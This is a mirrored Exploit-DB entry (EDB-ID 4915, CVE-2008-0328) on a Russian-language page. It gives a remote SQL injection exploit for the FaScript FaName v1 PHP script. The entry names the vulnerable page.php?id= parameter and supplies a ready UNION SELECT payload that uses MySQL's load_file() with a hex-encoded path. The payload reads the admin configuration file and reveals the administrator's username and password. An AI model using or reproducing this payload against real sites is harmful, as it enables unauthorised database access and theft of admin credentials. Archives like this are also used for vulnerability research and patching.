- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4915
- Проверка EDB
-
- Пройдено
- Автор
- KHASHAYAR FEREIDANI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-0328
- Дата публикации
- 2008-01-15
Код:
#####################################################################################
#### FaScript FaName v1 Remote Sql Injection ####
#### BY IRCRASH ####
#####################################################################################
# #
#AUTHOR : IRCRASH (Dr.Crash) #
# #
#Script Download : http://www.hotscripts.com/Detailed/66472.html #
# #
#Injection Adress : http://Sitename/faname/page.php?id=<SqL Code> #
# #
#Help : In This Script Admin Username and Password Save in ./admin/pconfig.php #
# You can open this file with load_file Function in mysql and see admin #
# Username and password in Page Source #
# #
# ./admin/pconfig.php Str2Hex : 0x2e2f61646d696e2f70636f6e6669672e706870 #
# #
#SQL Code for pconfig.php : 999999'%20union/**/select/**/0,load_file(0x2e2f61646d696e2f70636f6e6669672e706870),2,3/**/from/**/mysql.user/*
# #
# Our site : HTTP://IRCRASH.COM #
# #
#####################################################################################
# milw0rm.com [2008-01-15]
- Источник
- www.exploit-db.com